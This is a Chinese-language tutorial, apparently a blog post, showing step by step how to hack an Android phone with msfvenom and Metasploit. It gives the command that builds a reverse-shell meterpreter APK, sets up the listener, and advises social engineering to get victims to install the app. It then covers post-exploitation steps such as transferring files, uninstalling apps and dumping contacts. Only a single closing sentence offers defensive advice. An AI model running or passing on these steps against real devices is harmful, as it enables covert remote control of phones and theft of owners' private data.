如何在 Kali Linux 下用 Metasploit Msfvenom 破解安卓手机

在本文中,我们将学习如何使用Metasploit框架入侵Android手机。Android设备在全球范围内发展非常迅速,实际上使用了很多Linux系统的核心功能。这就是为什么选择Android是学习移动渗透测试的最佳途径。

这里我们使用Kali Linux来攻击目标。目标设置为Android手机,为此我们使用Android虚拟机。当然,虚拟Android和物理Android设备之间会有一些限制和区别,但为了学习pentesting,建议在虚拟设备上进行此测试。

我们将使用msfvenom创建一个有效负载,并将其保存为一个apk文件。在生成有效负载之后,我们需要为Metasploit框架设置一个侦听器。一旦目标下载并安装了恶意的apk,攻击者就可以很容易地在Metasploit上获得一个meterpreter会话。攻击者需要做一些社会工程来在受害者的移动设备上安装apk。

循序渐进教程

使用msfvenom生成有效负载

首先,启动Kali Linux,这样我们就可以生成一个apk文件作为恶意负载。我们需要检查本地IP,结果是“192.168.0.112”。你也可以在主机中使用你的公共/外部IP和端口转发,通过Internet入侵Android设备。

获得本地主机IP后,使用msfvenom工具,它将生成一个有效载荷,渗透Android设备。输入命令:

msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 R> /var/www/html/ehacking.apk

如下:

  • -p 表示有效负载类型
  • android/metepreter/reverse_tcp 指定一个来自目标android设备的反向meterpreter shell
  • LHOST 是您的本地IP
  • LPORT 被设置为侦听端口
  • R> /var/www/html将在apache服务器上直接给出输出
  • apk是最终输出的最终名称

这将花费一些时间来生成将近10,000字节的apk文件。

发起攻击

在启动攻击之前,我们需要检查apache服务器的状态。输入命令:

# service apache2 status

一切似乎都准备好了,现在启动msfconsole。使用multi/handler exploit,将有效负载设置为与生成的prevoisly相同,将LHOST和LPORT值设置为与有效负载中使用的相同,最后类型exploit来发起攻击。

在现实生活中,可以使用一些社会工程技术让目标下载恶意的apk文件。为了演示,我们只是访问攻击机器来下载Android设备中的文件。

在成功下载它之后,选择APP进行安装。

到目前为止,在我们尝试安装一些第三方应用程序时,这个选项经常出现,通常用户不会犹豫,允许从未知来源安装。

启用设置以从第三方源安装应用程序,最后点击底部的安装选项。

一旦用户安装并运行应用程序,meterepreter会话就会在攻击端立即打开。

后开发

输入“background”,然后输入“session”,列出连接到机器的所有ip的所有会话。

你可以通过输入session -i [session ID]与任何会话交互

进入会话后,输入“help”,向下列出我们可以在此会话中提出的所有命令。

您可以看到一些文件系统命令,它们在您试图跟踪一些敏感信息或数据时非常有用。通过使用这些,您可以轻松地下载或上载任何文件或信息。

您还将发现一些网络命令,包括portfwd和route。

一些强大的系统命令可以获得用户ID、shell或完整的系统信息。

输入“app_list”,它会显示设备上已安装的所有应用程序

我们还可以卸载Android设备上的任何应用程序

从Android设备中提取联系人

现在让我们通过输入“转储”和双标签从目标设备中提取一些联系人。

从Android设备中提取联系人它会显示从设备中提取的所有选项。输入“dump_contacts”然后进入

dump_contactsIt将从Android设备中提取所有联系人,并将其保存到本地目录中。要查看这个文件类型,请输入“ls”和“cat [file_name]”。

这将显示以前从目标设备下载的联系人文件的内容。这些信息非常敏感,可能会被黑客利用。

在meterpreter中有更多可用的命令。进一步尝试探索和学习我们能用安卓设备做什么。这表明我们已经成功地使用Kali Linux和Metasploit框架渗透到安卓设备中。

保护你的安卓设备的一个健康的建议是不要安装任何来自未知来源的应用程序,即使你真的想安装它,也要试着阅读和检查它的源代码来判断这个文件是否是恶意的。

所以,我希望它能回答最常见的问题,那就是如何破解安卓手机。

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!